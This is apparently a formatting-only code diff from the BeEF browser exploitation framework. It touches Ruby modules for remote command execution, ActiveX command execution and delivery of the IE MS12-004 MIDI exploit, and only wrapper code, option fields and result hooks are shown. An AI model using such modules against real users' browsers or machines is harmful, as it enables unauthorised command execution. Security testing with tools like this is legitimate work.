{ 'name' => 'rhost', 'ui_label' => 'URL', 'value' => 'https://x.x.x.x' },
{ 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '443' },
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' },
{ 'name' => 'cmd', 'ui_label' => 'Command', 'description' => 'Enter shell command to execute.', 'type' => 'textarea', 'value' => 'ls', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
save({ 'result' => @datastore['result'] }) unless @datastore['result'].nil?
save({ 'fail' => @datastore['fail'] }) unless @datastore['fail'].nil?
end
end

18
modules/exploits/local_host/activex_command_execution/module.rb
View File

@@ -4,15 +4,13 @@
# See the file 'doc/COPYING' for copying permission
#
class Activex_command_execution < BeEF::Core::Command
def self.options
[
{ 'name' => 'cmd', 'ui_label' => 'Command', 'type' => 'textarea', 'value' => 'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px' }
]
end
def self.options
return [
{'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

8
modules/exploits/local_host/ie_ms12_004_midi/module.rb
View File

@@ -9,16 +9,14 @@
# See: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_004_midi.rb
###
class Ie_ms12_004_midi < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.html', '/ie_ms12_004_midi', 'html')
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/ie_ms12_004_midi/ie_ms12_004_midi.mid', '/ie_ms12_004_midi', 'mid')
end
def post_execute
save({'result' => @datastore['result']})
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.html')
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.mid')
save({ 'result' => @datastore['result'] })
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.html')
# BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ie_ms12_004_midi.mid')
end
end

Some files were not shown because too many files have changed in this diff Show More